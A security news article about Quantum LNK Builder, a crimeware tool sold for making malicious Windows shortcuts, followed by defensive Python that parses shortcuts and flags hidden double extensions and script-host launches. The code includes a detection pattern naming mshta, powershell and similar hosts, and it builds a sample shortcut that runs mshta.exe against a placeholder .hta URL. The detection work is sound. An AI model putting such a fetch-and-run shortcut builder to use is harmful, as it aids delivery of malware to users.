A malware tool that lets cybercriminals create malicious Windows shortcut (.LNK) files has been spotted. At present, this tool has been discovered for sale on cybercrime forums.

Quantum LNK Builder

The tool, named Quantum Lnk Builder, is available for lease at various price offers.
  • It is available for a month at €189 (approx $200), for two months at €355 (approx $375), and for six months at €899 (approx $950). Users get lifetime access for €1,500 (approx $1585).
  • The tool makes it possible to spoof any extension and choose from over 300 icons for malicious link files. Further, it even has support for UAC and Windows SmartScreen bypass.
  • Quantum Builder supports multiple payloads per LNK file and can also create HTA and ISO payloads.
  • The earliest samples, which date back to May 24, posed as harmless-looking text files.

Attribution

The tool has been tied to the Lazarus Group on the basis of source code-level overlaps and a shared modus operandi of using LNK files to deliver later-stage payloads, implying that APT actors may also be using it.

Why LNK extensions?

  • By default, Windows hides the LNK extension. A file named file_name[.]txt[.]lnk is shown to the user as file_name[.]txt even when the ‘show file extension’ option is enabled. For this reason, users are more likely to be fooled into clicking this file type.
  • When an LNK file is run, it can execute PowerShell code that can be leveraged to perform further actions. In this specific case, it runs an HTML application file hosted on Quantum's website via MSHTA, a legitimate Windows utility for running HTA files.
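As an added, defender-side example (not code from the article or from the Quantum tool), the following Python parses the ShellLinkHeader and StringData of a shortcut per the MS-SHLLINK layout and flags the two tricks described above: a hidden double extension and a target that launches MSHTA or another script host. The sample shortcut is constructed inline and its URL is a placeholder; the parser also skips LinkTargetIDList/LinkInfo structures that the sample does not carry.

```python
import re
import struct
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID, little-endian
# LinkFlags bits from MS-SHLLINK that this parser needs
HAS_IDLIST, HAS_LINKINFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x08, 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")]
# script hosts a shortcut rarely needs to launch legitimately; mshta is the one the article names
SUSPICIOUS = re.compile(r"\b(mshta|powershell|pwsh|wscript|cscript|rundll32)(?:\.exe)?\b")

def parse_lnk(data: bytes) -> dict:
    """Parse ShellLinkHeader + StringData of a .lnk; LinkTargetIDList/LinkInfo are skipped."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    if flags & HAS_IDLIST:                       # u16 IDListSize followed by the item IDs
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                     # u32 LinkInfoSize covers the whole structure
        off += struct.unpack_from("<I", data, off)[0]
    out = {}
    for bit, key in STRING_FIELDS:               # each string: u16 char count, then the chars
        if flags & bit:
            n = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + n * width]
            out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
            off += n * width
    return out

def assess(filename: str, data: bytes) -> list:
    """Findings for one shortcut: hidden double extension and/or a script-host target."""
    findings = []
    parts = filename.lower().split(".")
    if parts[-1] == "lnk" and len(parts) >= 3:   # invoice.txt.lnk is displayed as invoice.txt
        findings.append(f"double extension: Explorer shows it as '{'.'.join(parts[:-1])}'")
    info = parse_lnk(data)
    launch = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    for host in sorted({m.group(1) for m in SUSPICIOUS.finditer(launch)}):
        findings.append(f"target launches {host} with arguments {info.get('arguments', '')!r}")
    return findings

def build_sample_lnk() -> bytes:
    """Constructed sample (not a real Quantum artifact): mshta.exe fetching a placeholder .hta URL."""
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, HAS_RELPATH | HAS_ARGS | IS_UNICODE,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    def s(text): return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + s(r"..\..\..\Windows\System32\mshta.exe") + s("https://example.invalid/stage.hta")
```

Running `assess("readme.txt.lnk", build_sample_lnk())` reports both the hidden extension and the MSHTA launch; real shortcuts from mail attachments or ISO images can be fed to `assess` the same way.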

Conclusion

A dedicated tool for generating malicious LNK files indicates the growing popularity of this file type among attackers. Moreover, several reports suggest that LNK-based attacks are gaining traction among several threat groups, including Emotet, Bumblebee, Qbot, and IcedID. The availability of dedicated tools could draw the attention of more groups toward this tactic in the near future.
Cyware Publisher